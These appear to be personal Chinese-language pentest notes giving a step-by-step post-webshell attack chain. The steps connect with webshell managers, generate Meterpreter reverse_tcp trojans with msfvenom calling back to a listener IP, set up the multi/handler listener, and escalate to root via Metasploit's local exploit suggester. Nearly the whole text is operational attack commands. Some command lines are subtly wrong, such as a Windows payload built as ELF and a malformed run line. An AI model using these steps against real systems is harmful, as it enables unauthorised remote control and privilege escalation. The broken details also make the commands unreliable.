1、当我们那到一个getshell我们可以直接使用蚁剑/冰鞋/哥斯拉来进行链接
2、链接之后我们要对其进行攻击
2.1、打开kali之后使用msfconsole
2.2、进入之后
1、生成
-p windows/x64/meterpreter/reverse_tcp //载入64位payload攻击载荷,如需32位把x64去掉即可
lhost=192.168.2.129 //设置本机kali的IP地址(ifconfig查看本机IP地址)
lport=6666 //设置一个监听端口,可以随意,未被占用即可
-f exe //定义此文件的类型为exe
-o test.exe
msfvenom -p linux/x64/meterpreter/reverse_tcp lhost=192.168.0.194 lport=6666 -f elf -o wang.elf (如果文件是带锁的加权限)
msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.2.129 lport=6666 -f elf -o test.elf
监听
msfconsole //进入框架
use exploit/multi/handler //载入模块看上面使用的模块
set payload linux/x64/meterpreter reverse_tcp //加载攻击负载核
set lhost 192.168.0.194 //设置本地监听地址,和生成的木马地址一致
set lport 6666 //设置本地监听端口,和生成的木马地址一致
run 666
3、到这之后我们就要开始提权了
3.1、我们使用bg命令进入后台
3.2、之后使用 use multi/recon/local_exploit_suggeste模块
3.3、之后进行set sessions 1 那个会话要提权就设置那个会话
3.4、之后会找到可以提权的的cve漏洞
3.5、use + 选择的cve漏洞
3.6、之后 set session 1 会话 然后run
3.7、之后就得到了root权限